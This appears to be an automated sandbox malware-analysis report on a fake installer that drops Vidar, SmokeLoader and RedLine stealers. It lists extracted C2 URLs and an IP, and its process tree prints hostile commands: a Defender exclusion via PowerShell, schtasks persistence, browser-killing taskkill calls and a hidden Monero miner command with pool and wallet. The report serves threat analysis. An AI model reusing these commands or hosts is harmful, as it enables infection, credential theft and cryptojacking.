Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
26s -
max time network
1810s -
platform
windows7_x64 -
resource
win7-ja-20210920 -
submitted
20-09-2021 19:44
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
vidar
40.7
706
https://petrenko96.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
janesam
65.108.20.195:6774
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2148 2172 rundll32.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4188 2172 rundll32.exe 81 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral1/memory/1636-207-0x00000000002A0000-0x00000000002BD000-memory.dmp family_redline behavioral1/memory/2628-241-0x0000000000B40000-0x0000000000B5F000-memory.dmp family_redline behavioral1/memory/2624-294-0x000000000041C5E2-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral1/files/0x000600000001228d-98.dat family_socelars behavioral1/files/0x000600000001228d-164.dat family_socelars behavioral1/files/0x000600000001228d-160.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/936-191-0x0000000001F60000-0x0000000002034000-memory.dmp family_vidar behavioral1/memory/936-192-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x0006000000012242-69.dat aspack_v212_v242 behavioral1/files/0x0006000000012242-70.dat aspack_v212_v242 behavioral1/files/0x0006000000012237-71.dat aspack_v212_v242 behavioral1/files/0x0006000000012237-72.dat aspack_v212_v242 behavioral1/files/0x0006000000012252-75.dat aspack_v212_v242 behavioral1/files/0x0006000000012252-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 16 IoCs
pid Process 1116 setup_installer.exe 584 setup_install.exe 972 Sun1917b8fb5f09db8.exe 1860 Sun1905815e51282417.exe 1804 Sun1908b94df837b3158.exe 1892 Sun19e4ade31b2a.exe 1636 Sun195a1614ec24e6a.exe 856 Sun191101c1aaa.exe 1768 Sun19de8ff4b6aefeb8.exe 472 Sun19262b9e49ad.exe 1928 Sun193fda712d9f1.exe 936 Sun19eb40faaaa9.exe 1244 Sun198361825f4.exe 1492 Sun1966fb31dd5a07.exe 2008 Sun1966fb31dd5a07.tmp 2180 Ze2ro.exe -
Loads dropped DLL 47 IoCs
pid Process 1680 setup_x86_x64_install.exe 1116 setup_installer.exe 1116 setup_installer.exe 1116 setup_installer.exe 1116 setup_installer.exe 1116 setup_installer.exe 1116 setup_installer.exe 584 setup_install.exe 584 setup_install.exe 584 setup_install.exe 584 setup_install.exe 584 setup_install.exe 584 setup_install.exe 584 setup_install.exe 584 setup_install.exe 436 cmd.exe 972 Sun1917b8fb5f09db8.exe 972 Sun1917b8fb5f09db8.exe 836 cmd.exe 836 cmd.exe 1580 cmd.exe 1764 cmd.exe 1848 cmd.exe 1576 cmd.exe 1576 cmd.exe 1420 cmd.exe 1040 cmd.exe 1804 Sun1908b94df837b3158.exe 1804 Sun1908b94df837b3158.exe 1556 cmd.exe 1636 Sun195a1614ec24e6a.exe 1636 Sun195a1614ec24e6a.exe 2016 cmd.exe 2016 cmd.exe 1960 cmd.exe 112 cmd.exe 936 Sun19eb40faaaa9.exe 936 Sun19eb40faaaa9.exe 1492 Sun1966fb31dd5a07.exe 1492 Sun1966fb31dd5a07.exe 472 Sun19262b9e49ad.exe 472 Sun19262b9e49ad.exe 1492 Sun1966fb31dd5a07.exe 2008 Sun1966fb31dd5a07.tmp 2008 Sun1966fb31dd5a07.tmp 2008 Sun1966fb31dd5a07.tmp 2008 Sun1966fb31dd5a07.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 96 ipinfo.io 97 ipinfo.io 9 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
pid pid_target Process procid_target 2356 936 WerFault.exe 48 3000 2608 WerFault.exe 86 3356 2752 WerFault.exe 70 3372 1244 WerFault.exe 50 3972 3264 WerFault.exe 114 2820 972 WerFault.exe 44 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3220 schtasks.exe 2856 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3816 timeout.exe 4120 timeout.exe -
Kills process with taskkill 8 IoCs
pid Process 4092 taskkill.exe 4320 taskkill.exe 3124 taskkill.exe 2944 taskkill.exe 3028 taskkill.exe 516 taskkill.exe 4276 taskkill.exe 4464 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1804 Sun1908b94df837b3158.exe 1804 Sun1908b94df837b3158.exe 1840 powershell.exe 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1804 Sun1908b94df837b3158.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeCreateTokenPrivilege 472 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 472 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 472 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 472 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 472 Sun19262b9e49ad.exe Token: SeTcbPrivilege 472 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 472 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 472 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 472 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 472 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 472 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 472 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 472 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 472 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 472 Sun19262b9e49ad.exe Token: SeBackupPrivilege 472 Sun19262b9e49ad.exe Token: SeRestorePrivilege 472 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 472 Sun19262b9e49ad.exe Token: SeDebugPrivilege 472 Sun19262b9e49ad.exe Token: SeAuditPrivilege 472 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 472 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 472 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 472 Sun19262b9e49ad.exe Token: SeUndockPrivilege 472 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 472 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 472 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 472 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 472 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 472 Sun19262b9e49ad.exe Token: 31 472 Sun19262b9e49ad.exe Token: 32 472 Sun19262b9e49ad.exe Token: 33 472 Sun19262b9e49ad.exe Token: 34 472 Sun19262b9e49ad.exe Token: 35 472 Sun19262b9e49ad.exe Token: SeDebugPrivilege 856 Sun191101c1aaa.exe Token: SeDebugPrivilege 1636 Sun195a1614ec24e6a.exe Token: SeDebugPrivilege 1840 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1680 wrote to memory of 1116 1680 setup_x86_x64_install.exe 28 PID 1680 wrote to memory of 1116 1680 setup_x86_x64_install.exe 28 PID 1680 wrote to memory of 1116 1680 setup_x86_x64_install.exe 28 PID 1680 wrote to memory of 1116 1680 setup_x86_x64_install.exe 28 PID 1680 wrote to memory of 1116 1680 setup_x86_x64_install.exe 28 PID 1680 wrote to memory of 1116 1680 setup_x86_x64_install.exe 28 PID 1680 wrote to memory of 1116 1680 setup_x86_x64_install.exe 28 PID 1116 wrote to memory of 584 1116 setup_installer.exe 29 PID 1116 wrote to memory of 584 1116 setup_installer.exe 29 PID 1116 wrote to memory of 584 1116 setup_installer.exe 29 PID 1116 wrote to memory of 584 1116 setup_installer.exe 29 PID 1116 wrote to memory of 584 1116 setup_installer.exe 29 PID 1116 wrote to memory of 584 1116 setup_installer.exe 29 PID 1116 wrote to memory of 584 1116 setup_installer.exe 29 PID 584 wrote to memory of 1360 584 setup_install.exe 31 PID 584 wrote to memory of 1360 584 setup_install.exe 31 PID 584 wrote to memory of 1360 584 setup_install.exe 31 PID 584 wrote to memory of 1360 584 setup_install.exe 31 PID 584 wrote to memory of 1360 584 setup_install.exe 31 PID 584 wrote to memory of 1360 584 setup_install.exe 31 PID 584 wrote to memory of 1360 584 setup_install.exe 31 PID 584 wrote to memory of 436 584 setup_install.exe 32 PID 584 wrote to memory of 436 584 setup_install.exe 32 PID 584 wrote to memory of 436 584 setup_install.exe 32 PID 584 wrote to memory of 436 584 setup_install.exe 32 PID 584 wrote to memory of 436 584 setup_install.exe 32 PID 584 wrote to memory of 436 584 setup_install.exe 32 PID 584 wrote to memory of 436 584 setup_install.exe 32 PID 584 wrote to memory of 1556 584 setup_install.exe 33 PID 584 wrote to memory of 1556 584 setup_install.exe 33 PID 584 wrote to memory of 1556 584 setup_install.exe 33 PID 584 wrote to memory of 1556 584 setup_install.exe 33 PID 584 wrote to memory of 1556 584 setup_install.exe 33 PID 584 wrote to memory of 1556 584 setup_install.exe 33 PID 584 wrote to memory of 1556 584 setup_install.exe 33 PID 584 wrote to memory of 1040 584 setup_install.exe 34 PID 584 wrote to memory of 1040 584 setup_install.exe 34 PID 584 wrote to memory of 1040 584 setup_install.exe 34 PID 584 wrote to memory of 1040 584 setup_install.exe 34 PID 584 wrote to memory of 1040 584 setup_install.exe 34 PID 584 wrote to memory of 1040 584 setup_install.exe 34 PID 584 wrote to memory of 1040 584 setup_install.exe 34 PID 584 wrote to memory of 1764 584 setup_install.exe 35 PID 584 wrote to memory of 1764 584 setup_install.exe 35 PID 584 wrote to memory of 1764 584 setup_install.exe 35 PID 584 wrote to memory of 1764 584 setup_install.exe 35 PID 584 wrote to memory of 1764 584 setup_install.exe 35 PID 584 wrote to memory of 1764 584 setup_install.exe 35 PID 584 wrote to memory of 1764 584 setup_install.exe 35 PID 584 wrote to memory of 836 584 setup_install.exe 36 PID 584 wrote to memory of 836 584 setup_install.exe 36 PID 584 wrote to memory of 836 584 setup_install.exe 36 PID 584 wrote to memory of 836 584 setup_install.exe 36 PID 584 wrote to memory of 836 584 setup_install.exe 36 PID 584 wrote to memory of 836 584 setup_install.exe 36 PID 584 wrote to memory of 836 584 setup_install.exe 36 PID 584 wrote to memory of 1576 584 setup_install.exe 37 PID 584 wrote to memory of 1576 584 setup_install.exe 37 PID 584 wrote to memory of 1576 584 setup_install.exe 37 PID 584 wrote to memory of 1576 584 setup_install.exe 37 PID 584 wrote to memory of 1576 584 setup_install.exe 37 PID 584 wrote to memory of 1576 584 setup_install.exe 37 PID 584 wrote to memory of 1576 584 setup_install.exe 37 PID 584 wrote to memory of 1420 584 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1360
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Loads dropped DLL
PID:436 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:972 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 10886⤵
- Program crash
PID:2820
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Loads dropped DLL
PID:1556 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:472 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1852
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:516
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Loads dropped DLL
PID:1040 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Loads dropped DLL
PID:1764 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵
- Executes dropped EXE
PID:1892 -
C:\Users\Admin\AppData\Roaming\6382090.scr"C:\Users\Admin\AppData\Roaming\6382090.scr" /S6⤵PID:2320
-
-
C:\Users\Admin\AppData\Roaming\3507708.scr"C:\Users\Admin\AppData\Roaming\3507708.scr" /S6⤵PID:2788
-
-
C:\Users\Admin\AppData\Roaming\1968703.scr"C:\Users\Admin\AppData\Roaming\1968703.scr" /S6⤵PID:2608
-
C:\Users\Admin\AppData\Roaming\1968703.scr"C:\Users\Admin\AppData\Roaming\1968703.scr"7⤵PID:2624
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 7527⤵
- Program crash
PID:3000
-
-
-
C:\Users\Admin\AppData\Roaming\6049516.scr"C:\Users\Admin\AppData\Roaming\6049516.scr" /S6⤵PID:2264
-
-
C:\Users\Admin\AppData\Roaming\4774670.scr"C:\Users\Admin\AppData\Roaming\4774670.scr" /S6⤵PID:1920
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Loads dropped DLL
PID:836 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵
- Loads dropped DLL
PID:1576 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵
- Executes dropped EXE
PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
- Loads dropped DLL
PID:1420 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2212
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2280
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3172
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3220
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3552
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:3092
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:2856
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:788
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:4484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:2384
-
C:\ProgramData\266668.exe"C:\ProgramData\266668.exe"8⤵PID:1860
-
-
C:\ProgramData\6195246.exe"C:\ProgramData\6195246.exe"8⤵PID:1328
-
-
C:\ProgramData\4994742.exe"C:\ProgramData\4994742.exe"8⤵PID:3264
-
C:\ProgramData\4994742.exe"C:\ProgramData\4994742.exe"9⤵PID:3832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 7649⤵
- Program crash
PID:3972
-
-
-
C:\ProgramData\8405870.exe"C:\ProgramData\8405870.exe"8⤵PID:3688
-
-
C:\ProgramData\2140871.exe"C:\ProgramData\2140871.exe"8⤵PID:3168
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CFA.tmp\CFB.tmp\CFC.bat C:\ProgramData\XS8MWKITC7SO3S3Y.exe"8⤵PID:968
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe /T9⤵
- Kills process with taskkill
PID:4320
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe /T9⤵
- Kills process with taskkill
PID:2944
-
-
C:\Windows\system32\timeout.exetimeout 39⤵
- Delays execution with timeout.exe
PID:4120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session9⤵PID:5056
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feebcb4f50,0x7feebcb4f60,0x7feebcb4f7010⤵PID:4204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1064 /prefetch:210⤵PID:2668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1704 /prefetch:810⤵PID:4988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1716 /prefetch:810⤵PID:2332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1828 /prefetch:110⤵PID:4924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2064 /prefetch:110⤵PID:1560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2344 /prefetch:210⤵PID:2856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2936 /prefetch:810⤵PID:2804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3504 /prefetch:810⤵PID:2168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2504 /prefetch:810⤵PID:5008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3068 /prefetch:810⤵PID:332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3048 /prefetch:810⤵PID:3396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3768 /prefetch:810⤵PID:4224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3764 /prefetch:810⤵PID:2528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3908 /prefetch:810⤵PID:3528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4036 /prefetch:810⤵PID:4796
-
-
